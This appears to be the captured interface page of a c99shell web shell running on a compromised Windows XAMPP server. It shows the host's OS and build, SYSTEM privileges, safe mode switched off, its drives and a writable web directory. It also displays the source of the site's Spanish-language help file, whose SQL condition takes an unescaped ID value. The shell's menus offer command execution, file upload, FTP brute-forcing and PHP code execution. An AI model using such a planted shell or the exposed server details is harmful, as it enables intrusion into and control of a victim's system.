!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\formas\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ayuda.php (1.08 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
        
            $cuando 
"aplicacion_ayuda_idapp = '$id_app' and aplicacion_ayuda_accion = '16'";
            
$donde " administracion_aplicacion_ayuda ";
        
            
// 1.Búsqueda de la ayuda
            
$vinculo_pg "";
            
$inicio_1 0;    
            
$control_hlp = new select_pg(1"aplicacion_ayuda_nombre, aplicacion_ayuda_texto"$donde$cuando25"(nombre)-(texto)"""$vinculo_pg ,$inicio_1); 
            
            
// 2. Extracción del mensaje.
            //echo $control_hlp->RESULTADOS;
            
$msg $control_hlp->RESULTADOS[0][0] . "<br>" $control_hlp->RESULTADOS[0][1];
            
//echo $msg;
            //echo $control_hlp->NUMERO_REGISTROS;
            
            // 3. Reemplazos
            
$msg str_replace("\'","(comilla)",$msg);
            
$msg str_replace("\"","(comilla_doble)",$msg);
            
$msg str_replace("<","(open)",$msg);
            
$msg str_replace(">","(close)",$msg);
            
$msg str_replace("?","(interrogante)",$msg);
            
$msg str_replace("&","(y)",$msg);
            
$msg str_replace("=","(igual)",$msg);
            
$msg str_replace("#","(numeral)",$msg);
            
$msg str_replace(";","(puntoycoma)",$msg);
            
$msg str_replace(":","(dospuntos)",$msg);            
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--